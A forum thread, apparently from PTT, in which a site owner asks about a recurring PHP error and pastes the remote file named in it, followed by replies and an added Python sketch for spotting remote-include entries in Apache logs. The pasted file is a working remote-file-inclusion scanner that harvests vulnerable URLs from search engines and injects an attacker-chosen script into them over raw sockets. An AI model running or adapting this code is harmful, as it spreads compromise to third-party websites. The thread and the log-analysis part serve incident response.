PHP board


Since yesterday, the following message has kept appearing in Apache's error_log, about once per second:

[Wed Jun 15 20:47:28 2011] [error] [client 187.127.72.193] PHP Notice: Use of undefined constant integer - assumed 'integer' in http://www.fpe.sn/webcam/pesquisadorRFI.txt?/config.php on line 190

http://www.fpe.sn is not my site at all, and I have no idea where it is.

I looked at the contents of http://www.fpe.sn/webcam/pesquisadorRFI.txt, which are as follows:

<?php
function filterPhpInjection(&$links) {
    //filter the url until =
    $buffer = array();
    foreach($links as $key => $value) {
        if(eregi("=",$value)) {
            preg_match('/[^=]+/',$value,$matches);
            $buffer[$key] = $matches[0] . "=";
        }
    }
    return $buffer;
}

function getLinks(&$buffer) {
    preg_match_all('/href="([^"> ]*)/',$buffer,$matches);
    foreach($matches[1] as $value) {
        if(eregi(".",$value) && !preg_match('/(google|orkut|live\.com|cade)/',$value)) {
            $matches_pure[] = $value;
        }
    }
    unset($matches);
    unset($buffer);
    foreach($matches_pure as $key => $value) {
        if(preg_match('/^\//',$value)) {
            unset($matches_pure[$key]);
        } elseif(preg_match('/^http/',$value) == 0 && preg_match('/^https/',$value) == 0) {
            $matches_pure[$key] = 'http://' . $value;
        }
    }
    $links = array();
    foreach($matches_pure as $value) {
        preg_match('/https?:\/\/[^\/]*/',$value,$first_step); # get content in http://..../
        $second_step = preg_split('/https?:\/\/[^\/]*/',$value); # get /.../..../..., the rest of url
        $host = preg_replace('/https?:\/\//','',$first_step[0]);
        $url = $second_step[1];
        if(eregi("http://|www",$host)) {
            $links[$host] = $url;
        } else {
            unset($host,$url);
        }
    }
    unset($matches_pure);
    return $links;
}

function getGoogle($string,$pages=1,$adicional="") {
    $num = 100; # fetch 100 results per page
    $start = 0; # start from result 0
    $buffer = "";
    do {
        $buffer .= @file_get_contents ("http://www.google.com.br/search?&q=" . urlencode("allinurl:$string$adicional") . "&num=$num&start=$start");
        if($buffer == false) {
            break 1;
        }
        if(eregi("We're sorry...",$buffer)) {
            break 1;
        }
        if($pages > 1) {
            $start += 100;
        }
        sleep(5);
    } while(--$pages);
    return $buffer;
}

function getCade($string,$pages=1,$adicional="") {
    $num = 100; # fetch 100 results per page
    $start = 1; # start from result 0
    $end = 1;
    $buffer = "";
    do {
        $buffer .= @file_get_contents ("http://cade.search.yahoo.com/search?&p=" . urlencode("inurl:$string$adicional") . "&n=$num&start=$start&b=$end");
        if($buffer == false) {
            break 1;
        }
        if(eregi("erro 999",$buffer)) {
            break 1;
        }
        if($pages > 1) {
            $end += 100;
        }
        sleep(5);
    } while(--$pages);
    return $buffer;
}

function getLive($string,$pages=1,$adicional="") {
    $num = 11; # fetch 11 results per page, actually 10
    $buffer ="";
    do {
        $buffer .= @file_get_contents ("http://search.live.com/results.aspx?q=" . urlencode("$string$adicional") . "&scope=&first=$num");
        if($buffer == false) {
            break 1;
        }
        if($pages > 1) {
            $num += 10;
        }
    } while(--$pages);
    return $buffer;
}

function gerador() {
    $num = rand(1,6);
    $alfabeto = range('a','z');
    $str = '';
    while($num--) {
        $n = rand(0,25);
        $str .= $alfabeto[$n];
    }
    $sites = array('ac','ad','ae','af','ag','ai','al','am','an','ao','aq','ar','as','at','au','aw','ax','az',
        'ba','bb','bd','be','bf','bg','bh','bi','bj','bm','bn','bo','br','bs','bt','bv','bw','by','bz',
        'ca','cc','cd','cf','cg','ch','ci','ck','cl','cm','cn','co','cr','cu','cv','cx','cy','cz',
        'de','dj','dk','dm','do','dz','ec','ee','eg','eh','er','es','et','eu','fi','fj','fk','fm','fo','fr',
        'ga','gb','gd','ge','gf','gg','gh','gi','gl','gm','gn','gp','gq','gr','gs','gt','gu','gw','gy',
        'hk','hm','hn','hr','ht','hu','id','ie','il','im','in','io','iq','ir','is','it','je','jm','jo','jp',
        'ke','kg','kh','ki','km','kn','kp','kr','kw','ky','kz','la','lb','lc','li','lk','lr','lr','ls','lt','lu','lv','ly',
        'ma','mc','md','me','mg','mh','mk','ml','mm','mn','mo','mp','mq','mr','ms','mt','mu','mv','mw','mx','my','mz',
        'na','nc','ne','nf','ng','ni','nl','no','np','nr','nu','nz','nc.tr','om',
        'pa','pe','pf','pg','ph','pk','pl','pm','pn','pr','ps','pt','pw','py','qa','re','ro','rs','ru','rw',
        'sa','sb','sc','sd','se','sg','sh','si','sj',' sk','sl','sm','sn','so','sr','st','su','sv','sy','sz',
        'tc','td','tf','tg','th','tj','tk','tl','tm','tn','to','tp','tr','tt','tv','tw','tz',
        'ua','ug','uk','us','uy','uz','va','vc','ve','vg','vi','vn','vu','wf','ws','ye','yt','yu','za','zm','zw');
    return '.php?' . $str . "= site:" . $sites[rand(0,250)];
    //return ".php?$str=";
}

if(isset($_GET['para']) && isset($_GET['tempo']) && isset($_GET['checador']) && isset($_GET['enviador']) ):
    ignore_user_abort(false);
    set_time_limit(0);
    define("NEWLINE","<br />");
    define("CHECADOR",$_GET['checador'] . '?servidor=');
    define("ENVIADOR",$_GET['enviador']);
    $para = $_GET['para']; // for the sender
    $tempo = localtime(time(),true);
    $tempo2 = $tempo['tm_min'] + $_GET['tempo'];
    while($tempo['tm_min'] < $tempo2) {
        $value = gerador();
        if(isset($_GET['addGoogle']))
            $buffer = getGoogle($value,2,' ' . $_GET['addGoogle']);
        else
            $buffer = getGoogle($value,2);
        if(isset($_GET['addCade']))
            $buffer .= getCade($value,2,' ' . $_GET['addCade']);
        else
            $buffer .= getCade($value);
        if(isset($_GET['addLive']))
            $buffer .= getLive($value,10,' ' .$_GET['addLive']);
        else
            $buffer .= getLive($value,10);
        $buffer = getLinks($buffer);
        $buffer = filterPhpInjection($buffer);
        foreach($buffer as $chave => $valor) {
            if(eregi("http://",$chave))
                $chave = str_replace("http://", "", $chave);
            if(!eregi("www.",$chave))
                $chave = "www." . $chave;
            $checa = @file_get_contents(CHECADOR . $chave);
            if(eregi("verdade",$checa))
                continue 1;
            $url = $chave . $valor;
            $inc = ENVIADOR;
            $get = $valor . $inc . "?&servidor=$url&para=$para";
            $header = "GET $get HTTP/1.1 \r\n";
            $header .= "Host: $chave \r\n\r\n";
            $sk = @socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
            $conn = @socket_connect($sk, $chave, 80);
            @socket_write($sk,$header,strlen($header));
            if(gettype($tempo['tm_min']/20) == integer) {
                mail($para,"máquina $chave pesquisando...");
            }
        }
        $tempo = localtime(time(),true);
    }
endif;
?>

How can I stop this message from appearing over and over? T-T
Please, could someone help me?

--
A woman falls in love with the man who makes her cry, but marries the man who makes her laugh.
A man falls in love with the woman who makes him laugh, but marries the woman who makes him cry.
--



※ Posted from: 批踢踢實業坊 (ptt.cc)
◆ From: 218.167.187.241
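1F:→ arrack: You're the one who got infected.. 06/15 21:02
2F:→ arrack: Search your source code and see whether that URL is in there 06/15 21:04
3F:→ september02: I've searched the files and MySQL and found nothing suspicious... 06/16 12:43
4F:→ averywu: PHP is a server-side thing, so something has probably gotten into your code 06/16 16:33
5F:→ arrack: Sometimes the virus is encrypted; you can start your search from the files' last-modified dates 06/16 20:24
6F:→ arrack: I've personally dealt with this kind of situation many times... 06/16 20:24
7F:→ arrack: Especially with old versions of open-source packaged software, such as osc... 06/16 20:25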
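
Added example (not part of the original thread or any participant's code): in the error_log entry quoted in the post, PHP names a remote URL with `?/config.php` appended as the file it was executing, which is consistent with a local `include` fetching that URL. The Python sketch below extracts such entries from an Apache error_log and finds access_log requests that carry a URL in a parameter; the access-log lines, the second error line, `remote.example`, `/index.php`, the `dir` parameter and the 203.0.113.x / 198.51.100.x addresses are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache 2.2-style error_log entry whose "in <file>" is a remote URL.
ERR_RE = re.compile(
    r"\[client (?P<ip>[^\]]+)\] PHP [^:]+: .*? in "
    r"(?P<file>(?:https?|ftp)://\S+) on line (?P<line>\d+)")
# Common/combined access_log request line.
REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/')

def remote_includes(error_lines):
    """(client, remote URL, suffix the local include appended, line) per hit."""
    hits = []
    for line in error_lines:
        m = ERR_RE.search(line)
        if m:
            url, _, suffix = m["file"].partition("?")
            hits.append((m["ip"], url, suffix, int(m["line"])))
    return hits

def rfi_requests(access_lines):
    """(client, local script, parameter, value) where a parameter holds a URL."""
    hits = []
    for line in access_lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if re.match(r"(?i)(?:https?|ftp)://", value):
                hits.append((m["ip"], parts.path, name, value))
    return hits

# First entry is the line quoted in the post; everything else is constructed.
SAMPLE_ERROR = [
    "[Wed Jun 15 20:47:28 2011] [error] [client 187.127.72.193] PHP Notice: "
    "Use of undefined constant integer - assumed 'integer' in "
    "http://www.fpe.sn/webcam/pesquisadorRFI.txt?/config.php on line 190",
    "[Wed Jun 15 20:47:30 2011] [error] [client 198.51.100.9] PHP Notice: "
    "Undefined index: id in /var/www/html/index.php on line 12",
]
SAMPLE_ACCESS = [
    '203.0.113.7 - - [15/Jun/2011:20:47:28 +0800] '
    '"GET /index.php?dir=http://remote.example/x.txt? HTTP/1.1" 200 512',
    '198.51.100.9 - - [15/Jun/2011:20:47:30 +0800] '
    '"GET /index.php?page=news HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in remote_includes(SAMPLE_ERROR) + rfi_requests(SAMPLE_ACCESS):
        print(hit)
```

The suffix returned by `remote_includes` (here `/config.php`) is the string to search for in your own `include`/`require` statements, and the script and parameter returned by `rfi_requests` point to the entry point. Setting `allow_url_include = Off` in php.ini stops PHP from including remote URLs.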






